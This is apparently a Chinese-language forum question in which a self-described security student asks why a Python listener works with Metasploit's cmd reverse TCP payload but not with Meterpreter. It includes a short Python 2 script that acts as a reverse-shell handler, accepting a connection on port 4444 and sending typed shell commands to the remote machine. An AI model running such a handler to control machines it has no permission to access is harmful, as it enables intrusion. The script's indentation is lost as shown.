我是一名网络安全学生,我不是破解者、scriptkiddy 或类似的东西,我正在研究 python Meterpreter 的侦听器,我找到了一个普通的 tcp 反向处理程序,它正在使用 cmd reverse tpc (metasploit),但是它不适用于meterpreter reverse tpc(metasploit)......有人知道为什么吗?谢谢。
#!/usr/bin/python
# import python modules
from socket import *
HOST = '' # '' means bind to all interfaces
PORT = 4444 # port
# create our socket handler
s = socket(AF_INET, SOCK_STREAM)
# set is so that when we cancel out we can reuse port
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# bind to interface
s.bind((HOST, PORT))
# print we are accepting connections
print "Listening on 0.0.0.0:%s" % str(PORT)
# listen for only 10 connection
s.listen(10)
# accept connections
conn, addr = s.accept()
# print connected by ipaddress
print 'Connected by', addr
# receive initial connection
data = conn.recv(1024)
# start loop
while 1:
# enter shell command
command = raw_input("Enter shell command or quit: ")
# send shell command
conn.send(command)
# if we specify quit then break out of loop and close socket
if command == "quit": break
# receive output from linux command
data = conn.recv(1024)
# print the output of the linux command
print data
# close socket
conn.close()